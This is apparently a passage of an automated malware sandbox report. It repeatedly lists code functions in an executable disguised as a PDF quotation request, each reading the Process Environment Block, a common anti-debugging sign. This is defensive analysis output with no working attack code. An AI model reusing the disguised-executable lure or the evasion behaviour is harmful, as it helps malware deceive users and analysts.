          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A82073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A91074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A469A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A541E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009E4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009E3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A98A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A0927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A54257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A95BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A7D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A98B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A98CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009E746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A78DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A4A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A98D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]
